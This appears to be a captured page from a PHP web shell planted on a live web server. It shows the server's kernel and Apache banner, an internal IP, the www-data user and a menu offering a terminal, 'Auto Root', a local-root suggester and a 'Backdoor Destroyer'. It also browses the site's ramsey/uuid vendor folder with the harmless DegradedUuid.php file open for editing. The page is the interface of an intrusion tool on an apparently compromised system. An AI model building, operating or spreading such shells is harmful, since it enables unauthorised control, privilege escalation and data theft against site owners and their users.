Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
vendor /
ramsey /
uuid /
src /
Delete
Unzip
Name
Size
Permission
Date
Action
Builder
[ DIR ]
drwxr-sr-x
2025-12-14 04:43
Codec
[ DIR ]
drwxr-sr-x
2025-12-14 04:43
Converter
[ DIR ]
drwxr-sr-x
2025-12-14 04:43
Exception
[ DIR ]
drwxr-sr-x
2025-12-14 04:43
Fields
[ DIR ]
drwxr-sr-x
2025-12-14 04:43
Generator
[ DIR ]
drwxr-sr-x
2025-12-14 04:43
Guid
[ DIR ]
drwxr-sr-x
2025-12-14 04:43
Lazy
[ DIR ]
drwxr-sr-x
2025-12-14 04:43
Math
[ DIR ]
drwxr-sr-x
2025-12-14 04:43
Nonstandard
[ DIR ]
drwxr-sr-x
2025-12-14 04:43
Provider
[ DIR ]
drwxr-sr-x
2025-12-14 04:43
Rfc4122
[ DIR ]
drwxr-sr-x
2025-12-14 04:43
Type
[ DIR ]
drwxr-sr-x
2025-12-14 04:43
Validator
[ DIR ]
drwxr-sr-x
2025-12-14 04:43
BinaryUtils.php
1.53
KB
-rw-r--r--
2025-12-14 04:43
DegradedUuid.php
589
B
-rw-r--r--
2025-12-14 04:43
DeprecatedUuidInterface.php
4.89
KB
-rw-r--r--
2025-12-14 04:43
DeprecatedUuidMethodsTrait.php
13.01
KB
-rw-r--r--
2025-12-14 04:43
FeatureSet.php
12.06
KB
-rw-r--r--
2025-12-14 04:43
Uuid.php
23.93
KB
-rw-r--r--
2025-12-14 04:43
UuidFactory.php
14.97
KB
-rw-r--r--
2025-12-14 04:43
UuidFactoryInterface.php
5.71
KB
-rw-r--r--
2025-12-14 04:43
UuidInterface.php
3.1
KB
-rw-r--r--
2025-12-14 04:43
functions.php
4.61
KB
-rw-r--r--
2025-12-14 04:43
Save
Rename
<?php /** * This file is part of the ramsey/uuid library * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. * * @copyright Copyright (c) Ben Ramsey <ben@benramsey.com> * @license http://opensource.org/licenses/MIT MIT */ declare(strict_types=1); namespace Ramsey\Uuid; /** * @deprecated DegradedUuid is no longer necessary to represent UUIDs on 32-bit systems. * Transition any type declarations using this class to {@see UuidInterface}. * * @immutable */ class DegradedUuid extends Uuid { }